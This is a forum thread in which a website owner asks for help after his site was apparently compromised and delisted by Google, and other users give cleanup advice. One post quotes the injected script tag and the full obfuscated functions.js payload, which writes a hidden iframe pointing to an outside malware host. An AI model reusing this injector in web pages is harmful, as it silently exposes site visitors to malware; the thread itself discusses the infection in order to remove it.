My site which had a decent traffic is now seemed to be infected by some virus due to which google has blocked my pages in its search engine what do I do now I see an extra line added to my site in every page, which calls a functions.js file after the closing html tag, please help me remove this problem and get me back my site to normal. Thanks my site www.neeshu.com
since your site is offline now, its impossible to see what type of site you have and what kind of content you had that might hide virus / trojans. typically any / every site who allows member login and file upload of ANY file type may become subject to hosting trojans/virus/malware ! hence, before getting online again you REALLY need to FIND the entry point where, how and who uploaded malware of any kind. any graphic file or text file or mp3, any file that loads into a browser or displays into a browser or requires install of a plugin in your browser may be the source - also plain txt files or js files. if YOU are the only contributor to entire site's content, then you have to inspect all files YOU ever uploaded. NO matter how many hundred or thousands of hrs you need to actually FIND the origin of your malware. check ALL your server logs, error_log, access_log. among many methods, get / download a full copy of ALL site-files into your PC - then run a fully updated visurs scan across ALL files to find possible infected files. once you have that file(s) - search your server logs to see when and who uploaded / modified that file. then figure out how it was done ( fine the HOLE YOU have left open on your site ) and study the case then close/secure all properly. it takes time. years ago I had a security problem and it took some 3 weeks day and night work to figure all out and secure all properly. final coclusion: make sure you have only content created BY YOU and UPLOADED by YOU on your site, else above problem may repeat again and again over time. God bless
thanks for the valuable advice I sent the site offline because of the virus its on now let me know if you see the virus
Can someone tell me how do I get my website back into google search Today I opened my site on the office pc and saw this virus error from eset nod32 saying some malicious script has infected my page. I checked the page in firefox and saw this line added to my page <script language="javascript" src="/functions.js" type="text/javascript"></script> the js file has this code eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d.f("<1 7=\'8://6.4/2.3?5\' 9=\'0\' e=\'0\' c=\'a:b\'></1>");',16,16,'|iframe|in|cgi|cn||orentraff|src|http|width|display|none|style|document|height|write'.split('|'),0,{})) Code (markup):
remove virus clean up entire site FIND how the virus got into your site SECURE the hole then ask G for reinstatement explaining what you did to secure your site and guarantee that such infringement NEVER EVER occurs in your entire life. you have to proof TO KNOW what you do !! to do so you have to assure that ONLY YOU are in control of entire site and no one else uploads any files - including NO hackers! its your site = your work = study, google, learn and solve. its part of having a site. we all have to do our own homework!
I think its because of the image upload option that the virus got into it or may be servage servers are infected I contacted them and they asked me the trojan name since I am not using nod32 i have no idea what the virus name is only nod32 is detecting a virus. Thanks a lot for motivational words hans I hope I can undo what all went wrong here
as long as you allow image upload OR ANY file upload, you ALWAYS will be hosting virus and other malware !! hence better get used to getting banned or deindexed by G and other major SE or change your site policy and create all content yourself !! and as long as you dont know where the virus is or how it got onto your site, you wont be able to really solve / secure your site. mod_security and/or snort may (partially) solve your security issues. both however require that you have your OWN dedicated server and are your own server admin. image and file hosting services may need to get used to this type of problems in addition to copyright infringement lawsuits ... alsways think twice if you are that rich to afford to CREATE YOUR own problems. if you can afford to CREATE such problems by having this type of site, then you also have to afford to SOLVE all the ongoing consequences. if you do as I said MUCH earlier - download ALL onto your PC and use a quality virus scanner - then you get all the IDs you need, but you still need to to all the access_log study to find the entrance point /source of your malware. Good luck
Are you on shared hosting? If you are I would talk to your host and see if it is a server wide problem. I would be worried your server was compromised.